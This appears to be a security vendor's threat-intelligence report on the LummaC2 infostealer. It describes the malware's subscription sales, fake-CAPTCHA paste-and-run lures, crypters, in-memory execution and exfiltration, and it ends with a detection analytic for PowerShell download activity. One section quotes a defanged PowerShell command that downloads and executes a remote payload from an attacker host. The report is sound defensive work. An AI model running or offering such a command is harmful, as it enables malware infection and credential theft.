The most popular infostealer of 2024, LummaC2 exemplifies the advantages of using a malware-as-a-service (MaaS) model.
LummaC2, also known as LummaC or Lumma Stealer, is a malware-as-a-service (MaaS) stealer that has been available for purchase on underground forums since at least mid-2022. Subscriptions start at $250 USD per month, all the way up to a one-time payment of $20,000 USD to gain access to Lumma source code. Adversaries favor the MaaS model because they can launch their operations with relative ease and low overhead, giving them access to effective malware like LummaC2 with continuous development, customer support, and a range of features.
Because it’s distributed as a MaaS offering, LummaC2 is used against many targets opportunistically, with no particular industry or geography being an exclusive recipient.
Similar to other stealers, LummaC2 was initially designed to target cryptocurrency wallets, browser information, and 2FA tokens, but it has expanded beyond its original scope. It remains in active development, and over time has added features including customizable stealer configurations and a loader capability for delivering additional payloads via EXE, DLL, or PowerShell.
As it has grown in popularity over the past year, LummaC2 has posed a major threat against organizations large and small, as the stealer exposes credentials for user identities, allowing adversaries to gain initial access to organizations using valid accounts.
Initial access indicators of compromise (IOC) vary according to the delivery method and loader chosen by the adversary, so early detection telemetry differs from case to case. LummaC2 delivery vehicles have been presented to users in an array of creative ways, including:
Adversaries have also used LummaC2 to deliver PrivateLoader, Amadey, and NetSupport Manager.
We described LummaC2’s paste-and-run tactic in our November 2024 Intelligence Insights.
In December 2024 we saw a LummaC2 threat that began with the victim interacting with a fake CAPTCHA-style paste-and-run lure hosted at solve.gevaq[.]com. Successful paste-and-run execution resulted in mshta.exe
reaching out to deduhko2.klipzyroloo[.]shop to retrieve an encoded PowerShell script. That script in turn pulled down and executed additional remote resources from deduhko[.]klipzyroloo[.]shop with the command:
"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('hxxps[://]deduhko.klipzyroloo[.]shop/Grpc.eml'))}
The downloaded content at Grpc.eml was about 18 MB in size, which can indicate a large amount of embedded content, such as one or more embedded executable files. This type of LummaC2 configuration appears to be using Grpc.eml
as the process injection source, targeting powershell.exe
with no command-line interface (CLI) to leverage its memory space for the next phases of LummaC2 execution.
The above LummaC2 execution is very different from one we observed in November 2024 and previously shared, illustrating the variety of observable behaviors and artifacts that can be seen in different LummaC2 configurations.
Behavioral detection of LummaC2 can vary quite a bit since it requires distributors to use crypters. Multiple detection analytics could catch LummaC2 simply because an adversary configured the crypter in a particular way. Crypters that we’ve observed paired with LummaC2 include PureCrypter and CypherIT.
Depending on the delivery method and adversary configurations, LummaC2 may be injected into a hollowed process—we’ve observed OpenWith.exe
and more.com
, among others—or leverage DLL side-loading for execution. The stealer activity occurs within memory with direct exfiltration to C2, however in some cases collected data may be staged in text files like System.txt prior to ZIP archiving for theft. This means that looking for C2 activity or suspicious TXT file creation may also help detect LummaC2. It does not maintain persistence on its own, however accompanying loaders or follow-on payloads may create and maintain persistence.
LummaC2 relies on HTTPS for exfiltration of data to adversary systems. In late 2023 to early 2024, the developers of the stealer migrated its exfiltration capabilities to use HTTPS over plaintext HTTP in an effort to to evade network-based detection controls. Along with using HTTPS for encrypted communications, LummaC2 developers also leverage Cloudflare services to make their exfiltration systems resilient and highly available.
As the stealer became more mature in 2024, LummaC2 incorporated more features to remain on the bleeding edge of the stealer market. To ensure data exfiltration even when interrupted, the LummaC2 developers included functionality to send information in piecemeal rather than doing the “collect, stage, send” technique. In addition, when Google implemented application bound encryption (ABE) in Chromium browsers, LummaC2 was rapid to adopt new techniques to obtain browser cookies and bypass ABE.
Since LummaC2 has been distributed in so many different ways, preventative measures can take many approaches. We’ve observed LummaC2 distributed in malicious advertisements, fake software installations, paste-and-run campaigns, and more. We’ve also observed it delivered in script form, via DLL sideloads.
General preventative measures that apply to multiple malware families also help fight against LummaC2:
For response, an excellent playbook would look something like this:
invoke-expression
to download contentThis pseudo-detection analytic identifies instances of PowerShell using invoke-expression
to download content from an HTTP URL. Adversaries attempting to deliver threats like LummaC2 use this function to download remotely hosted scripts and code for further exploitation of an endpoint. Note that legitimate package management and orchestration utilities like Chocolatey may use this function to update themselves.
Note: * is a placeholder for strings associated with legitimate use of this function in your environment
process == (powershell)
&&
deobfuscated_command_line_includes (iex)
||
deobfuscated_command_line_includes ('.invoke' || 'invoke-expression')
&&
deobfuscated_command_line_includes (http)
&&
command_line_does_not_include == (*)
The following Atomic Red Team tests may help you validate your coverage for behavior related to LummaC2.
Get curated insights on managed detection and response (MDR) services, threat intelligence, and security operations—delivered straight to your inbox every month.